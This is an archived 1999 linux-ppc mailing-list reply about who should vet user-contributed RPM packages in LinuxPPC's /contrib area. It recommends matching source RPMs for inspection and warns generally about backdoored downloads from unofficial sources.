'Re: verifying /contrib (was gftp2.0.5a-1 in contrib is slightly'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       linux-ppc
Subject:    Re: verifying /contrib (was gftp2.0.5a-1 in contrib is slightly
From:       "Andrew B. Arthur" <arthur99 () global2000 ! net>
Date:       1999-10-23 22:53:58
[Download RAW message or body]


on 10/23/99 4:22 PM, R Shapiro at reshapiro@mediaone.net wrote:

>> Unfortunately, the manpower to examine each contrib'd rpm is simply not
>> there.

LinuxPPC Inc, certainly doesn't, it's up to the users (imho) to check this
area, and make sure there are no problems with contributed rpms. If there
are, your best bet is to post to linuxppc-user@lists.linuxppc.org,
ftp@linuxppc.org and of course the author.

As a rule, any contributed RPM should also have a matching SRPM -- as a
security measure, since SRPM you can easily check the source code (if
available) and the spec file. In theory since the public can check these,
and since almost every contributed file is regularly downloaded it should be
obvious which files do not belong up there.

>> But even then, there's no way LinuxPPC Inc could individually check each and
>> every binary for trojans.
>> 
That's totally unpractical. As an user downloading from /contrib you should
be responsible to make sure the binary is safe to install on your system,
and that it won't hurt others that later download files.

> The security issue was a passing comment, I don't want to get hung up on that
> (though I have the unpleasant feeling we will anyway, since everybody like to
> talk about security :-).
> 
There are always risks in getting items from binary format or source code
format from an unofficial source. In the words of BitchX.org "Downloading
Source or Binary Files from any site, but this official site, may lead you
to install a backdoored or insecure version that could destroy data".

> I was more interested in knowing whether anyone was checking whether the
> contributed rpms actually installed, and that the code thus installed actually
> ran. 

Again, this should be up to the contributors and the people that download it
and try it out.

>> The good news is that none of the binaries uploaded to contrib make their way
>> into the main distribution.

Of course, that not to say that some of the ones, even done by "experienced"
packagers don't have there issues. For example broken WindowMaker RPMS
shipped with every PowerPC Linux distro or some of the KDE 1.1.1 RPMs also
had issues.


Thanks, 
                   
Andrew Arthur a.k.a. AArthur
arthur99@global2000.net
AIM: arthur998


** Sent via the linuxppc-user mail list. See http://lists.linuxppc.org/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic